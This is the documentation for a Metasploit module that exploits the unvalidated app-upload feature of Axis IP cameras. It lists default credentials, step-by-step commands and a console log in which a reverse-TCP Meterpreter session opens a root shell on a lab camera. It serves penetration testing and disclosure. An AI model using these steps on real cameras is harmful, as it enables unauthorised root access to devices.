Jake Baines
3.8 KiB
Vulnerable Application
Description
This module exploits the "Apps" feature in Axis IP cameras. The feature allows third party developers to upload and execute 'eap' applications on the device. The system does not validate the application comes from a trusted source, so a malicious attacker can upload and execute arbitrary code. The issue has no CVE, although the technique was made public in 2018.
This module uploads and executes stageless meterpreter as root via the application upload
feature. The module will also uninstall the application upon completion. Uploading the application
requires valid credentials. The default administrator credentials used to be root:root but
newer firmware versions force users to provide a new password for the root user.
The module was tested on an Axis M3044-V using the latest firmware (9.80.3.8: December 2021). All devices that support the "App" feature are presumed to be vulnerable at this time.
Installation
Axis cameras are physical devices and aren't known to have been successfully emulated. However, if you have a device, affected firmware can be downloaded from:
A free account is required to navigate the site but you can download specific firmware without authentication. For example, the latest version for the Axis M3044-V can be downloaded here:
Verification Steps
- Acquire an affected device
- Do:
use exploit/linux/http/axis_app_install - Do:
set RHOST <ip> - Do:
set PASSWORD <password> - Do:
check - Verify the remote target is flagged as vulnerable
- Do:
set LHOST <ip> - Do:
exploit - You should get a Meterpreter session.
Options
USERNAME
The username to authenticate to the web server with. The default value is "root".
PASSWORD
The password to authenticate to the web server with. The default value is "root".
Scenarios
Axis M3044-V using firmware 9.80.3.8. Get Meterpreter session.
msf6 > use exploit/linux/http/axis_app_install
[*] Using configured payload linux/armle/meterpreter_reverse_tcp
msf6 exploit(linux/http/axis_app_install) > set RHOST 192.168.1.183
RHOST => 192.168.1.183
msf6 exploit(linux/http/axis_app_install) > set LHOST 192.168.1.220
LHOST => 192.168.1.220
msf6 exploit(linux/http/axis_app_install) > set password labpass1
password => labpass1
msf6 exploit(linux/http/axis_app_install) > check
[*] 192.168.1.183:80 - The target appears to be vulnerable. The target reports itself to be a 'AXIS M3044-V'
msf6 exploit(linux/http/axis_app_install) > run
[*] Started reverse TCP handler on 192.168.1.220:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target reports itself to be a 'AXIS M3044-V'
[*] Creating an application package named: sey
[*] Sending an application upload request to /axis-cgi/packagemanager.cgi
[+] Application installed. Pausing 5 seconds to let the filesystem sync.
[+] Deleted /etc/systemd/system/sey.service
[*] Meterpreter session 1 opened (192.168.1.220:4444 -> 192.168.1.183:60298 ) at 2022-02-14 17:30:51 -0800
[*] Sending a delete application request to /axis-cgi/applications/control.cgi
meterpreter > getuid
Server username: root
meterpreter > shell
Process 16666 created.
Channel 1 created.
id
uid=0(root) gid=0(root)
cat /proc/cpuinfo
processor : 0
model name : ARMv7 Processor rev 1 (v7l)
BogoMIPS : 156.00
Features : half thumb fastmult vfp edsp neon vfpv3 tls vfpd32
CPU implementer : 0x41
CPU architecture: 7
CPU variant : 0x4
CPU part : 0xc09
CPU revision : 1
Hardware : Ambarella S2L (Flattened Device Tree)
Revision : 0000
Serial : 0000000000000000
pwd
/
exit
meterpreter > quit
[*] Shutting down Meterpreter...
[*] 192.168.1.183 - Meterpreter session 1 closed. Reason: Died
msf6 exploit(linux/http/axis_app_install) >